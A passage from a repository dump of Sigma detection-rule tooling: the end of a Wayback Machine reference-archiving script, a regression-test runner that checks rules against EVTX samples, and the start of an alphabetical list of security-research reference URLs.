newly_archived_references = []\n\n    for ref in ref_list:\n        try:\n            archive_response = requests.get(url=WEB_ARCHIVE_GET_URL + ref, timeout=30)\n            # If the URL is not yet archived, the Wayback Machine returns a 404 response\n            status_code = archive_response.status_code\n            if status_code in (200, 301, 302):\n                # Already archived\n                already_archived.append(ref)\n                print(\"Reference '{}' is already archived\".format(ref))\n            elif status_code == 403:\n                # Wayback Machine does not have permission to access the reference.\n                error_archiving.append(ref)\n                print(\n                    \"Wayback Machine got permission denied in the past, when trying to access reference '{}'. Not archiving.\".format(\n                        ref\n                    )\n                )\n            else:\n                print(\"Reference '{}' is not archived. Archiving...\".format(ref))\n                archive_response = requests.post(url=WEB_ARCHIVE_SAVE_URL + ref, timeout=60)\n                # Only record the reference as archived if the save request succeeded.\n                # Otherwise it would land in rule-references.txt and never be retried.\n                if archive_response.ok:\n                    newly_archived_references.append(ref)\n                else:\n                    error_archiving.append(ref)\n                    print(\n                        \"Archiving reference '{}' failed with HTTP status {}\".format(\n                            ref, archive_response.status_code\n                        )\n                    )\n\n            # We sleep so we don't spam the Wayback Machine too much :)\n            time.sleep(1)\n        except requests.RequestException as e:\n            # Connection errors and timeouts end up here; a bare except would also swallow KeyboardInterrupt\n            error_archiving.append(ref)\n            print(\"Error while archiving reference '{}': {}\".format(ref, e))\n\n    return already_archived, newly_archived_references, error_archiving\n\n\ndef sort_references(file_path: str):\n    \"\"\"Sort the references in the rule-references.txt file alphabetically.\"\"\"\n    try:\n        with open(file_path, \"r\") as f:\n            references = [line.strip() for line in f.readlines() if line.strip()]\n\n        # Sort references alphabetically (case-insensitive)\n        references.sort(key=str.lower)\n\n        # Write the sorted references back to the file\n        with open(file_path, \"w\") as f:\n            for ref in references:\n                f.write(ref + \"\\n\")\n\n        print(\"References sorted successfully.\")\n\n    except Exception as e:\n        print(f\"Error sorting references: {e}\")\n\n\nif __name__ == \"__main__\":\n    print(\"Archiving references ...\\n\")\n\n    tmp_ref_list = get_references(path_to_rules)\n\n    # Set difference (not an intersection): only keep references that are not yet listed in rule-references.txt\n    ref_list = sorted(set(tmp_ref_list) - set(RULE_REFERENCES))\n\n    already_archived, newly_archived_references, error_archiving = archive_references(\n        ref_list\n    )\n\n    with open(\"tests/rule-references.txt\", \"a\") as f:\n        for ref in already_archived:\n            f.write(ref)\n            f.write(\"\\n\")\n\n        for ref in newly_archived_references:\n            f.write(ref)\n            f.write(\"\\n\")\n\n    # Sort the references alphabetically at the end\n    print(\"Sorting references...\")\n    sort_references(\"tests/rule-references.txt\")\n\n    # Write markdown output to open the issue\n    with open(\".github/latest_archiver_output.md\", \"w\") as f:\n        f.write(\"# Reference Archiver Results\\n\\n\")\n        f.write(f\"Last Execution: {datetime.today().strftime('%Y-%m-%d %H:%M:%S')}\\n\\n\")\n        f.write(\"### Archiver Script Results\\n\\n\")\n        f.write(\"\\n#### Newly Archived References\\n\\n\")\n        if newly_archived_references:\n            for ref in newly_archived_references:\n                f.write(f\"- {ref}\\n\")\n        else:\n            f.write(\"N/A\\n\")\n\n        f.write(\"\\n#### Already Archived References\\n\\n\")\n        if already_archived:\n            for ref in already_archived:\n                f.write(f\"- {ref}\\n\")\n        else:\n            f.write(\"N/A\\n\")\n\n        f.write(\"\\n#### Error While Archiving References\\n\\n\")\n        if error_archiving:\n            for ref in error_archiving:\n                f.write(f\"- {ref}\\n\")\n        else:\n            f.write(\"N/A\\n\")\n\n    print(\"\\nDone.\")\n"
  },
  {
    "path": "tests/regression_tests_runner.py",
    "content": "\"\"\"Run regression tests for Sigma rules based on their regression_tests_path attribute.\"\"\"\n\nimport argparse\nimport json\nimport os\nimport subprocess\nimport sys\nfrom typing import Dict, List\n\nimport yaml\n\n\ndef get_absolute_path(base_path: str, relative_path: str) -> str:\n    \"\"\"Convert a relative path to an absolute path based on a base path.\"\"\"\n    if os.path.isabs(relative_path):\n        return relative_path\n\n    # Normalize path separators\n    relative_path = relative_path.replace(\"/\", os.sep).replace(\"\\\\\", os.sep)\n    workspace_root = base_path\n    while not os.path.exists(os.path.join(workspace_root, relative_path)):\n        parent = os.path.dirname(workspace_root)\n        if parent == workspace_root:  # Reached filesystem root\n            break\n        workspace_root = parent\n    return os.path.join(workspace_root, relative_path)\n\n\ndef load_info_yaml(\n    regression_tests_path: str, rule_id: str, file_path: str\n) -> tuple[List[Dict], List[Dict]]:\n    \"\"\"Load and parse the regression test info YAML file.\"\"\"\n    results = []\n    missing_files = []\n\n    if not os.path.exists(regression_tests_path):\n        missing_files.append(\n            {\n                \"rule_path\": file_path,\n                \"rule_id\": rule_id,\n                \"missing_file\": regression_tests_path,\n                \"file_type\": \"regression_tests_path\",\n            }\n        )\n        return results, missing_files\n\n    try:\n        with open(regression_tests_path, \"r\", encoding=\"utf-8\") as f:\n            info_data = yaml.safe_load(f)\n\n        if not info_data or \"regression_tests_info\" not in info_data:\n            print(f\"Warning: No regression_tests_info found in {regression_tests_path}\")\n            return results, missing_files\n\n        # Extract test data from regression_tests_info\n        test_data = []\n        regression_tests = info_data.get(\"regression_tests_info\", [])\n  
\n        rule_metadata = info_data.get(\"rule_metadata\", []) or []\n        # Guard against a present-but-empty (null) list in the info file\n        regression_tests = regression_tests or []\n\n        for test in regression_tests:\n            if not isinstance(test, dict):\n                continue\n\n            test_path = get_absolute_path(\n                os.path.dirname(file_path), test.get(\"path\", \"\")\n            )\n\n            # Check if test file exists\n            if not os.path.exists(test_path):\n                missing_files.append(\n                    {\n                        \"rule_path\": file_path,\n                        \"rule_id\": rule_id,\n                        \"missing_file\": test_path,\n                        \"file_type\": \"test_file\",\n                        \"test_name\": test.get(\"name\", \"Unnamed Test\"),\n                        \"test_type\": test.get(\"type\", \"unknown\"),\n                    }\n                )\n\n            test_data.append(\n                {\n                    \"type\": test.get(\"type\", \"unknown\"),\n                    \"path\": test_path,\n                    \"name\": test.get(\"name\", \"Unnamed Test\"),\n                    \"provider\": test.get(\"provider\", \"\"),\n                }\n            )\n\n        # check_rule_id_consistency compares against rule_metadata[0].id, so take the\n        # first dict entry and stop instead of silently keeping the last one\n        info_metadata_rule_id = None\n        for metadata_entry in rule_metadata:\n            if not isinstance(metadata_entry, dict):\n                continue\n            info_metadata_rule_id = metadata_entry.get(\"id\", \"\")\n            break\n\n        if test_data:\n            results.append(\n                {\n                    \"path\": file_path,\n                    \"id\": rule_id,\n                    \"tests\": test_data,\n                    \"info_metadata_rule_id\": info_metadata_rule_id,\n                }\n            )\n\n    except yaml.YAMLError as e:\n        print(f\"Warning: Could not parse info file {regression_tests_path}: {e}\")\n\n    return results, missing_files\n\n\ndef find_rule_missing_test(rule_data: Dict, file_path: str) -> tuple[bool, List[Dict]]:\n    \"\"\"Find missing test files 
for a single rule based on its data.\n\n    Returns:\n        skip: True if the rule should be skipped, False otherwise\n        missing_regression_tests_path: List of dicts with missing regression_tests_path info\n\n    \"\"\"\n    missing_regression_tests_path = []\n    rule_id = rule_data.get(\"id\", \"unknown\")\n    rule_status = rule_data.get(\"status\", \"\").lower()\n\n    # Check if rule status requires regression tests\n    requires_regression_tests = rule_status in [\"test\", \"stable\"]\n\n    # Check if rule has regression_tests_path\n    has_regression_tests_path = \"regression_tests_path\" in rule_data\n\n    # If rule requires regression tests but doesn't have regression_tests_path\n    if requires_regression_tests and not has_regression_tests_path:\n        missing_regression_tests_path.append(\n            {\n                \"rule_path\": file_path,\n                \"rule_id\": rule_id,\n                \"status\": rule_status,\n            }\n        )\n        return True, missing_regression_tests_path\n\n    # Skip rules that don't require regression tests\n    # and don't have regression_tests_path\n    if not requires_regression_tests and not has_regression_tests_path:\n        return True, missing_regression_tests_path\n    return False, missing_regression_tests_path\n\n\ndef find_rule_tests(rule_data: Dict, file_path: str) -> tuple[List[Dict], List[Dict]]:\n    \"\"\"Find regression tests and missing files for a single rule based on its data.\"\"\"\n    results = []\n    missing_files = []\n    rule_id = rule_data.get(\"id\", \"unknown\")\n\n    if rule_data and \"regression_tests_path\" in rule_data:\n        regression_tests_path = get_absolute_path(\n            os.path.dirname(file_path),\n            rule_data.get(\"regression_tests_path\", \"\"),\n        )\n\n        # Load the info.yml file\n        yml_result, yml_missing_files = load_info_yaml(\n            regression_tests_path, rule_id, file_path\n        )\n        
results.extend(yml_result)\n        missing_files.extend(yml_missing_files)\n    return results, missing_files\n\n\n# pylint: disable=too-many-locals\ndef find_rules_with_tests(\n    rules_paths: List[str],\n) -> tuple[List[Dict], List[Dict], List[Dict]]:\n    \"\"\"Find all rules that have a 'regression_tests_path' attribute pointing to test info files.\n\n    Returns:\n        tuple: (rules_with_tests, missing_files, missing_regression_tests_path)\n    \"\"\"\n    results = []\n    missing_files = []\n    missing_regression_tests_path = []\n\n    for rules_path in rules_paths:\n        if not os.path.exists(rules_path):\n            print(f\"Warning: Rules path {rules_path} does not exist\")\n            continue\n\n        for root, _, files in os.walk(rules_path):\n            for file in files:\n                if not file.endswith(\".yml\"):\n                    continue\n\n                file_path = os.path.join(root, file)\n                try:\n                    with open(file_path, \"r\", encoding=\"utf-8\") as f:\n                        rule_data = yaml.safe_load(f)\n\n                    if not rule_data:\n                        continue\n\n                    # Check for missing regression_tests_path\n                    skip, missing_test = find_rule_missing_test(rule_data, file_path)\n                    missing_regression_tests_path.extend(missing_test)\n                    if skip:\n                        continue\n\n                    # Find tests for the rule\n                    (\n                        result,\n                        missing_file,\n                    ) = find_rule_tests(rule_data, file_path)\n                    results.extend(result)\n                    missing_files.extend(missing_file)\n\n                except yaml.YAMLError as e:\n                    print(f\"Warning: Could not parse {file_path}: {e}\")\n\n    return results, missing_files, missing_regression_tests_path\n\n\ndef run_evtx_checker(\n    
rule_path: str,\n    rule_id: str,\n    test_data: Dict,\n    evtx_checker_path: str,\n    thor_config: str,\n) -> tuple[bool, str]:\n    \"\"\"Run evtx-sigma-checker and check if rule ID is in output.\"\"\"\n    evtx_path = test_data[\"path\"]\n\n    # File existence is now checked upfront in find_rules_with_tests\n    # No need to check again here\n\n    cmd = [\n        evtx_checker_path,\n        \"--log-source\",\n        thor_config,\n        \"--evtx-path\",\n        evtx_path,\n        \"--rule-level\",\n        \"informational\",\n        \"--rule-path\",\n        os.path.dirname(rule_path),\n    ]\n\n    try:\n        # check=True raises CalledProcessError on a non-zero exit code, handled below\n        result = subprocess.run(\n            cmd, capture_output=True, text=True, timeout=300, check=True\n        )\n\n        # Check if rule ID appears in output (one JSON object per line)\n        output_lines = result.stdout.strip().splitlines()\n        found_match = False\n        match_output = \"\"\n\n        for line in output_lines:\n            try:\n                json_obj = json.loads(line)\n                if isinstance(json_obj, dict) and json_obj.get(\"RuleId\") == rule_id:\n                    found_match = True\n                    match_output = line\n                    break\n            except json.JSONDecodeError:\n                # Skip lines that aren't valid JSON\n                print(f\"  Warning: Skipping non-JSON line: {line}\")\n                continue\n\n        return found_match, match_output\n\n    except subprocess.TimeoutExpired:\n        print(\"  Timeout: evtx-sigma-checker timed out\")\n        return False, \"\"\n    except subprocess.CalledProcessError as e:\n        print(f\"  Error running evtx-sigma-checker: {e}\")\n        if e.stderr:\n            print(f\"  Output: {e.stderr}\")\n        return False, \"\"\n\n\ndef run_test(\n    rule_path: str,\n    rule_id: str,\n    test_data: Dict,\n    evtx_checker_path: 
str,\n    thor_config: str,\n) -> tuple[bool, str]:\n    \"\"\"Run a test based on its type.\"\"\"\n    test_type = test_data.get(\"type\", \"unknown\")\n\n    if test_type == \"evtx\":\n        return run_evtx_checker(\n            rule_path, rule_id, test_data, evtx_checker_path, thor_config\n        )\n    print(f\"  Warning: Unknown test type '{test_type}', skipping\")\n    return False, \"\"\n\n\ndef parse_arguments() -> argparse.Namespace:\n    \"\"\"Parse command-line arguments.\"\"\"\n    parser = argparse.ArgumentParser(\n        description=\"Run regression tests for Sigma rules with regression_tests_path\"\n    )\n\n    parser.add_argument(\n        \"--rules-paths\",\n        required=True,\n        action=\"extend\",\n        nargs=\"+\",\n        help=\"One or more space-separated paths to rule directories (the option may be repeated)\",\n    )\n\n    parser.add_argument(\n        \"--evtx-checker\",\n        help=\"Path to evtx-sigma-checker binary (required unless using --validate-only)\",\n    )\n\n    parser.add_argument(\n        \"--thor-config\",\n        help=\"Path to thor.yml configuration file (required unless using --validate-only)\",\n    )\n\n    parser.add_argument(\n        \"--validate-only\",\n        action=\"store_true\",\n        help=\"Only validate rule status requirements without running tests\",\n    )\n\n    parser.add_argument(\n        \"--ignore-validation\",\n        action=\"store_true\",\n        help=\"Ignore rule status validation requirements\",\n    )\n\n    parser.add_argument(\n        \"--verbose\",\n        action=\"store_true\",\n        help=\"Enable verbose output, showing successful test results as well\",\n    )\n\n    return parser.parse_args()\n\n\ndef init_checks(args: argparse.Namespace) -> None:\n    \"\"\"Initialization that checks for functional environment.\"\"\"\n    if args.validate_only:\n        print(\"Starting Rule Status Validation...\")\n    else:\n        print(\"Starting Regression Tests...\")\n\n        # Check required 
arguments for test execution\n        if not args.evtx_checker or not args.thor_config:\n            print(\n                \"Error: --evtx-checker and --thor-config are required unless using --validate-only\"\n            )\n            sys.exit(1)\n\n        # Check if evtx-sigma-checker exists\n        if not os.path.exists(args.evtx_checker):\n            print(f\"Error: evtx-sigma-checker not found at {args.evtx_checker}\")\n            sys.exit(1)\n\n        # Check if THOR config exists\n        if not os.path.exists(args.thor_config):\n            print(f\"Error: Thor config not found at {args.thor_config}\")\n            sys.exit(1)\n        print(f\"Rules paths: {args.rules_paths}\")\n\n    if not args.validate_only:\n        print(f\"EVTX checker: {args.evtx_checker}\")\n        print(f\"Thor config: {args.thor_config}\")\n    print()\n\n\n# pylint: disable=too-many-locals\ndef run_tests(\n    args: argparse.Namespace, rules_with_tests\n) -> tuple[int, int, List[Dict]]:\n    \"\"\"Run tests for all rules with test data.\"\"\"\n    total_tests = 0\n    passed_tests = 0\n    failures = []\n    for rule_info in rules_with_tests:\n        rule_path = rule_info[\"path\"]\n        rule_id = rule_info[\"id\"]\n        tests = rule_info[\"tests\"]\n\n        if args.verbose:\n            print(f\"\\nTesting rule: {rule_id}\")\n            print(f\"  File: {rule_path}\")\n\n        for i, test_data in enumerate(tests):\n            test_name = test_data.get(\"name\", f\"Test {i+1}\")\n            test_type = test_data.get(\"type\", \"unknown\")\n            test_path = test_data.get(\"path\", \"unknown\")\n\n            if args.verbose:\n                print(f\"  {test_name} (type: {test_type}): {test_path}\")\n            total_tests += 1\n\n            success, output = run_test(\n                rule_path, rule_id, test_data, args.evtx_checker, args.thor_config\n            )\n\n            if success:\n                passed_tests += 1\n                if 
args.verbose:\n                    print(f\"    ✓ PASS - Match found for Rule ID: {rule_id}\\n\")\n                    print(f\"    Output: {output}\")\n            else:\n                failures.append(\n                    {\n                        \"rule_id\": rule_id,\n                        \"rule_path\": rule_path,\n                        \"test_name\": test_name,\n                        \"test_type\": test_type,\n                        \"test_path\": test_path,\n                        \"test_number\": i + 1,\n                    }\n                )\n                if args.verbose:\n                    print(\"    ✗ FAIL\")\n\n        if args.verbose:\n            print()\n    return total_tests, passed_tests, failures\n\n\ndef validate_missing_tests(\n    args: argparse.Namespace,\n    rules_with_tests: List[Dict],\n    missing_regression_tests_path: List[Dict],\n) -> None:\n    \"\"\"Print rules missing regression_tests_path and handle validation.\"\"\"\n\n    # Check for missing regression_tests_path in test/stable rules\n    if missing_regression_tests_path and not args.ignore_validation:\n        print()\n        print(\"-\" * 50)\n        print(\"RULES MISSING REGRESSION_TESTS_PATH:\")\n        print(\"-\" * 50)\n        for missing in missing_regression_tests_path:\n            print(f\"Rule: {missing['rule_id']} (status: {missing['status']})\")\n            print(f\"  File: {missing['rule_path']}\")\n            print()\n        print(\"=\" * 70)\n        print(\n            \"Rules with status 'test' or 'stable' must have a 'regression_tests_path' field.\"\n        )\n        print(\"Please add regression tests for these rules or change their status.\")\n        print(\"=\" * 70)\n        print(\n            f\"\\nERROR: Found {len(missing_regression_tests_path)} \"\n            \"test/stable rule(s) without regression_tests_path.\"\n        )\n\n        sys.exit(1)\n    elif missing_regression_tests_path and args.ignore_validation:\n        
print(\n            f\"\\nWARNING: Found {len(missing_regression_tests_path)} \"\n            \"test/stable rule(s) without regression_tests_path (validation ignored)\"\n        )\n        print(\n            \"Consider adding regression tests for these rules \"\n            \"or changing their status to 'experimental'.\"\n        )\n\n    # If validate-only mode, exit successfully after validation\n    if args.validate_only:\n        if args.ignore_validation and missing_regression_tests_path:\n            print(\"✅ All rules passed validation (validation ignored)!\")\n        else:\n            print(\"✅ All rules passed validation!\")\n        print(f\"Found {len(rules_with_tests)} rules with regression tests configured.\")\n        sys.exit(0)\n\n\ndef check_missing_test_files(missing_files: List[Dict]) -> None:\n    \"\"\"Check for missing test files and print errors if any are found.\"\"\"\n    if not missing_files:\n        return\n\n    print(f\"\\nERROR: Found {len(missing_files)} missing file(s):\")\n    print(\"=\" * 60)\n\n    regression_test_files = [\n        f for f in missing_files if f[\"file_type\"] == \"regression_tests_path\"\n    ]\n    test_files = [f for f in missing_files if f[\"file_type\"] == \"test_file\"]\n\n    if regression_test_files:\n        print(f\"\\nMISSING REGRESSION TEST INFO FILES ({len(regression_test_files)}):\")\n        print(\"-\" * 50)\n        for missing in regression_test_files:\n            print(f\"Rule: {missing['rule_id']}\")\n            print(f\"  File: {missing['rule_path']}\")\n            print(f\"  Missing: {missing['missing_file']}\")\n            print()\n\n    if test_files:\n        print(f\"\\nMISSING TEST DATA FILES ({len(test_files)}):\")\n        print(\"-\" * 50)\n        for missing in test_files:\n            print(f\"Rule: {missing['rule_id']}\")\n            print(f\"  File: {missing['rule_path']}\")\n            print(f\"  Test: {missing['test_name']} (type: {missing['test_type']})\")\n        
    print(f\"  Missing: {missing['missing_file']}\")\n            print()\n\n    print(\"=\" * 60)\n    print(\"Please ensure all referenced files exist before running tests.\")\n    sys.exit(1)\n\n\ndef print_summary(total_tests: int, passed_tests: int, failures: List[Dict]) -> None:\n    \"\"\"Print a summary of the test results.\"\"\"\n    print(\"=\" * 60)\n    print(\"REGRESSION TEST SUMMARY\")\n    print(\"=\" * 60)\n    print(f\"Total tests run: {total_tests}\")\n    print(f\"Passed: {passed_tests}\")\n    print(f\"Failed: {len(failures)}\")\n\n    if total_tests > 0:\n        success_rate = (passed_tests / total_tests) * 100\n        print(f\"Success rate: {success_rate:.1f}%\")\n\n    # Print failures\n    if failures:\n        print(f\"\\nFAILED TESTS ({len(failures)}):\")\n        print(\"-\" * 40)\n        for failure in failures:\n            print(f\"Rule: {failure['rule_id']}\")\n            print(f\"  File: {failure['rule_path']}\")\n            print(f\"  Test: {failure['test_name']} (type: {failure['test_type']})\")\n            print(f\"  Path: {failure['test_path']}\")\n            print()\n\n    print(\"=\" * 60)\n\n\ndef check_rule_id_consistency(rules_with_tests: List[Dict]) -> List[Dict]:\n    \"\"\"Check if rule IDs are consistent between rule files and their info.yml files.\n    Also checks if rule IDs match the test file names.\n\n    Returns:\n        List of dicts containing information about inconsistent rule IDs\n    \"\"\"\n    inconsistent_rules = []\n\n    for rule_info in rules_with_tests:\n        rule_id = rule_info[\"id\"]\n        info_metadata_rule_id = rule_info.get(\"info_metadata_rule_id\", \"\")\n        rule_path = rule_info[\"path\"]\n        tests = rule_info.get(\"tests\", [])\n\n        # Check rule ID vs info.yml rule_metadata[0].id consistency\n        if not info_metadata_rule_id:\n            inconsistent_rules.append(\n                {\n                    \"rule_id\": rule_id,\n                    
\"info_metadata_rule_id\": info_metadata_rule_id,\n                    \"rule_path\": rule_path,\n                    \"issue\": \"missing_info_metadata_rule_id\",\n                    \"expected\": rule_id,\n                    \"actual\": info_metadata_rule_id,\n                    \"message\": \"info.yml is missing rule_metadata or rule_metadata[0].id\",\n                }\n            )\n        elif rule_id != info_metadata_rule_id:\n            inconsistent_rules.append(\n                {\n                    \"rule_id\": rule_id,\n                    \"info_metadata_rule_id\": info_metadata_rule_id,\n                    \"rule_path\": rule_path,\n                    \"issue\": \"rule_vs_info_metadata_mismatch\",\n                    \"expected\": rule_id,\n                    \"actual\": info_metadata_rule_id,\n                    \"message\": f\"Rule ID '{rule_id}' in rule file does not match \"\n                    f\"info.yml rule_metadata[0].id '{info_metadata_rule_id}'\",\n                }\n            )\n\n        # Check rule ID vs test file name consistency\n        for test in tests:\n            test_path = test.get(\"path\", \"\")\n            if test_path:\n                # Extract filename without extension\n                filename = os.path.basename(test_path)\n                name_without_ext = os.path.splitext(filename)[0]\n                file_ext = os.path.splitext(filename)[1].lower()\n\n                # Check if the filename (without extension) matches the rule ID\n                # Only check for .evtx and .json files (.json is optional conversion of .evtx)\n                if file_ext in [\".evtx\", \".json\"] and name_without_ext != rule_id:\n                    expected_filename = f\"{rule_id}{file_ext}\"\n                    inconsistent_rules.append(\n                        {\n                            \"rule_id\": rule_id,\n                            \"test_filename\": filename,\n                            \"rule_path\": 
rule_path,\n                            \"test_path\": test_path,\n                            \"issue\": \"rule_vs_testfile_mismatch\",\n                            \"expected\": expected_filename,\n                            \"actual\": filename,\n                            \"message\": f\"Rule ID '{rule_id}' does not match test file\"\n                            f\"name '{name_without_ext}' (expected: {rule_id}{file_ext})\",\n                        }\n                    )\n\n    if inconsistent_rules:\n        print(\"\\nERROR: Found rule ID inconsistencies:\")\n        print(\"=\" * 60)\n        print()\n\n        # Group by issue type for better readability\n        rule_vs_info_issues = [\n            r\n            for r in inconsistent_rules\n            if r.get(\"issue\")\n            in [\"rule_vs_info_metadata_mismatch\", \"missing_info_metadata_rule_id\"]\n        ]\n        rule_vs_testfile_issues = [\n            r\n            for r in inconsistent_rules\n            if r.get(\"issue\") == \"rule_vs_testfile_mismatch\"\n        ]\n\n        if rule_vs_info_issues:\n            print(\"RULE ID vs INFO.YML RULE_METADATA[0].ID MISMATCHES:\")\n            print(\"-\" * 50)\n            for inconsistent in rule_vs_info_issues:\n                print(f\"Rule file ID: {inconsistent['rule_id']}\")\n                print(\n                    f\"Info.yml rule_metadata[0].id: {inconsistent['info_metadata_rule_id']}\"\n                )\n                print(f\"Expected: {inconsistent['expected']}\")\n                print(f\"Actual: {inconsistent['actual']}\")\n                print(f\"Rule file: {inconsistent['rule_path']}\")\n                print(f\"Message: {inconsistent['message']}\")\n                print(\"-\" * 50)\n                print()\n\n        if rule_vs_testfile_issues:\n            print(\"RULE ID vs TEST FILE NAME MISMATCHES:\")\n            print(\"-\" * 40)\n            for inconsistent in rule_vs_testfile_issues:\n                
print(f\"Rule ID: {inconsistent['rule_id']}\")\n                print(f\"Expected filename: {inconsistent['expected']}\")\n                print(f\"Actual filename: {inconsistent['actual']}\")\n                print(f\"Rule file: {inconsistent['rule_path']}\")\n                print(f\"Test file: {inconsistent['test_path']}\")\n                print(f\"{inconsistent['message']}\")\n                print()\n\n        print(\"<=>\" * 20)\n        print(\"Rule IDs must match between:\")\n        print(\"1. Rule files ID and their info.yml rule_metadata[0].id\")\n        print(\"2. Rule files ID and their test file names (EVTX/JSON files)\")\n        print(\"   Note: JSON files are optional conversions of EVTX files\")\n    return inconsistent_rules\n\n\ndef main():\n    \"\"\"Main function to run regression tests for Sigma rules.\"\"\"\n    args = parse_arguments()\n    init_checks(args)\n\n    # Find rules with tests\n    print(\"Scanning for rules with test data...\")\n    rules_with_tests, missing_files, missing_regression_tests_path = (\n        find_rules_with_tests(args.rules_paths)\n    )\n\n    print(f\"Found {len(rules_with_tests)} rule(s) with regression tests configured.\\n\")\n\n    print(\"Checking for consistent rule <--> test mapping...\")\n    inconsistent_rules = check_rule_id_consistency(rules_with_tests)\n    if inconsistent_rules:\n        sys.exit(1)\n    else:\n        print(\"All rules are mapped correctly.\")\n\n    validate_missing_tests(args, rules_with_tests, missing_regression_tests_path)\n    check_missing_test_files(missing_files)\n    print()\n    if not rules_with_tests:\n        print(\"No rules with test data found\")\n        sys.exit(1)\n\n    # Test each rule\n    print(\"Running tests...\\n\")\n    total_tests, passed_tests, failures = run_tests(args, rules_with_tests)\n\n    print_summary(total_tests, passed_tests, failures)\n\n    # Exit with error code if any tests failed\n    if failures:\n        sys.exit(1)\n\n\nif __name__ 
== \"__main__\":\n    main()\n"
  },
  {
    "path": "tests/rule-references.txt",
    "content": "http://0xthem.blogspot.com/2014/03/t-emporal-persistence-with-and-schtasks.html\nhttp://addbalance.com/word/startup.htm\nhttp://az4n6.blogspot.com/2016/02/more-on-trust-records-macros-and.html\nhttp://blog.harmj0y.net/redteaming/operational-guidance-for-offensive-user-dpapi-abuse/\nhttp://blog.sevagas.com/?Hacking-around-HTA-files\nhttp://blog.sevagas.com/?Yet-another-sdclt-UAC-bypass\nhttp://blog.talosintelligence.com/2022/09/lazarus-three-rats.html\nhttp://carnal0wnage.attackresearch.com/2012/06/webdav-server-to-download-custom.html\nhttp://edgeguides.rubyonrails.org/security.html\nhttp://etutorials.org/Microsoft+Products/microsoft+windows+server+2003+terminal+services/Chapter+6+Registry/Registry+Keys+for+Terminal+Services/\nhttp://guides.rubyonrails.org/action_controller_overview.html\nhttp://hyp3rlinx.altervista.org/advisories/MICROSOFT_WINDOWS_DEFENDER_DETECTION_BYPASS.txt\nhttp://hyp3rlinx.altervista.org/advisories/Windows_TCPIP_Finger_Command_C2_Channel_and_Bypassing_Security_Software.txt\nhttp://managed670.rssing.com/chan-5590147/all_p1.html\nhttp://pastebin.com/FtygZ1cg\nhttp://powershellhelp.space/commands/set-netfirewallrule-psv5.php\nhttp://redplait.blogspot.com/2020/07/whats-wrong-with-etw.html\nhttp://remoteawesomethoughts.blogspot.com/2019/05/windows-10-task-schedulerservice.html\nhttp://resources.netsupportsoftware.com/resources/manualpdfs/nsm_manual_uk.pdf\nhttp://rules.emergingthreats.net/open/snort-2.9.0/rules/emerging-user_agents.rules\nhttp://security-research.dyndns.org/pub/slides/FIRST2017/FIRST-2017_Tom-Ueltschi_Sysmon_FINAL_notes.pdf\nhttp://woshub.com/how-to-clear-rdp-connections-history/\nhttp://woshub.com/manage-windows-firewall-powershell/\nhttp://woshub.com/rds-shadow-how-to-connect-to-a-user-session-in-windows-server-2012-r2/\nhttp://www.botopedia.org/search?searchword=scan&searchphrase=all\nhttp://www.danielbohannon.com/blog-1/2017/3/12/powershell-execution-argument-obfuscation-how-it-can-make-detection-easier\nhttp://
www.gmer.net/\nhttp://www.irongeek.com/homoglyph-attack-generator.php\nhttp://www.korznikov.com/2017/03/0-day-or-feature-privilege-escalation.html\nhttp://www.leeholmes.com/blog/2017/03/17/detecting-and-preventing-powershell-downgrade-attacks/\nhttp://www.leeholmes.com/blog/2017/09/21/searching-for-content-in-base-64-strings/\nhttp://www.powertheshell.com/ntfsstreams/\nhttp://www.securityfocus.com/infocus/1633\nhttp://www.solomonson.com/posts/2010-07-09-reading-eventviewer-command-line/\nhttp://www.sqlinjection.net/errors\nhttp://www.stuffithoughtiknew.com/2019/02/detecting-bloodhound.html\nhttp://www.windowexe.com/bbs/board.php?q=jsschhlp-exe-c-program-files-common-files-justsystem-jsschhlp-jsschhlp\nhttp://www.xuetr.com/\nhttps://0x00sec.org/t/clientside-exploitation-in-2018-how-pentesting-has-changed/7356\nhttps://0xdf.gitlab.io/2018/11/08/powershell-history-file.html\nhttps://2019.offzone.moscow/ru/report/hunting-for-powershell-abuses/\nhttps://4sysops.com/archives/creating-a-complete-memory-dump-without-a-blue-screen/\nhttps://4sysops.com/archives/use-powershell-to-download-a-file-with-http-https-and-ftp/\nhttps://aboutdfir.com/the-key-to-identify-psexec/\nhttps://abuse.io/lockergoga.txt\nhttps://academy.hackthebox.com/course/preview/active-directory-bloodhound/bloodhound--data-collection\nhttps://access.redhat.com/articles/4409591#audit-record-types-2\nhttps://access.redhat.com/documentation/en-us/red_hat_enterprise_linux/6/html/security_guide/sec-configuring_pam_for_auditing\nhttps://access.redhat.com/documentation/en-us/red_hat_enterprise_linux/7/html/security_guide/sec-understanding_audit_log_files\nhttps://access.redhat.com/security/cve/cve-2019-14287\nhttps://adepts.of0x.cc/netsh-portproxy-code/\nhttps://admx.help/?Category=InternetExplorer&Policy=Microsoft.Policies.InternetExplorer::NoFirstRunCustomise\nhttps://admx.help/?Category=Office2016&Policy=excel16.Office.Microsoft.Policies.Windows::L_TrustedLoc01\nhttps://admx.help/?Category=Office2016&Policy=of
fice16.Office.Microsoft.Policies.Windows::L_MacroRuntimeScanScope\nhttps://admx.help/?Category=Windows_10_2016&Policy=Microsoft.Policies.ControlPanelDisplay::CPL_Personalization_NoDesktopBackgroundUI\nhttps://admx.help/?Category=Windows_10_2016&Policy=Microsoft.Policies.InternetExplorer::IZ_IncludeUnspecifiedLocalSites\nhttps://admx.help/?Category=Windows_10_2016&Policy=Microsoft.Policies.InternetExplorer::IZ_ProxyByPass\nhttps://admx.help/?Category=Windows_10_2016&Policy=Microsoft.Policies.PowerShell::EnableScripts\nhttps://admx.help/?Category=Windows_10_2016&Policy=Microsoft.Policies.WindowsDesktop::Wallpaper\nhttps://admx.help/?Category=Windows_7_2008R2&Policy=Microsoft.Policies.InternetCommunicationManagement::EventViewer_DisableLinks\nhttps://admx.help/?Category=Windows_7_2008R2&Policy=Microsoft.Policies.WindowsDefender::SpyNetReporting\nhttps://admx.help/HKCU/software/policies/microsoft/office/16.0/excel/security/protectedview\nhttps://admx.help/HKLM/SOFTWARE/Policies/Microsoft/Windows%20NT/Terminal%20Services\nhttps://admx.help/HKLM/Software/Policies/Mozilla/Firefox/DNSOverHTTPS\nhttps://adsecurity.org/?p=1714\nhttps://adsecurity.org/?p=1772\nhttps://adsecurity.org/?p=2053\nhttps://adsecurity.org/?p=2277\nhttps://adsecurity.org/?p=2288\nhttps://adsecurity.org/?p=2398\nhttps://adsecurity.org/?p=2604\nhttps://adsecurity.org/?p=2921\nhttps://adsecurity.org/?p=3458\nhttps://adsecurity.org/?p=3466\nhttps://adsecurity.org/?p=3513\nhttps://adviso